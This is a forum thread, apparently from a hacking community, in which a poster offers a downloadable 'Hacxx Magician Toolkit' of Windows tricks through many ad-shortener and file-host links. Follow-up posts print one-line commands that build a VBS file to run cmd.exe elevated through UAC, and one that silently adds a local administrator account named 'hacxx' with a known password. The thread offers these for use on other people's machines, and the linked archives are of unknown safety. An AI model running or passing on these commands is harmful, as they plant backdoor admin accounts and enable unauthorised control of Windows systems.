Hacxx Magician Toolkit - Free Download
|
09-24-2022, 07:52 PM
Bericht: #1
|
|||
|
|||
Hacxx Magician Toolkit - Free Download
Some of my tricks to execute on any windows machine. Win+R - Can be used in execute. Cmd.exe - Can only be used on command line. Download 1: http://lyksoomu.com/NE3j http://bc.vc/dmsgAJ1 https://lnkload.com/2zPQM http://adfoc.us/50323385388994 Download 2: https://filecrypt.cc/Container/A45B590E78.html https://oxy.name/d/brag http://gigapeta.com/dl/10356985a32ea65 https://rapidgator.net/file/679d3d69576b...f4217c1ef4 http://www.filefactory.com/file/52jwuj90...oolkit.rar https://ddownload.com/wx3x1d17aeou/Hacxx...oolkit.rar https://drop.download/vqggnhi3novf/Hacxx...oolkit.rar https://www.europeup.com/ckie501mfs1k/Ha...oolkit.rar https://www.upload-4ever.com/vqp9tb67ycrz https://file.al/aalwp28gjqjw/Hacxx_Magic...t.rar.html OG Marketplace - https://files.offshore.cat/XNObT0Tz.html |
|||
09-25-2022, 12:08 AM
Bericht: #2
|
|||
|
|||
RE: Hacxx Magician Toolkit - Free Download
New code added, elevate any exe with UAC (User Account Control)...
UAC Elevation - Elevate any exe (Win+R) Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", , , "runas", 1 >>1b.vbs && 1b.vbs OG Marketplace - https://files.offshore.cat/XNObT0Tz.html |
|||
09-25-2022, 04:20 PM
Bericht: #3
|
|||
|
|||
RE: Hacxx Magician Toolkit - Free Download
New code added, add an admin user from execute (Win+R)
Add an admin user with just one line of code Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs OG Marketplace - https://files.offshore.cat/XNObT0Tz.html |
|||
|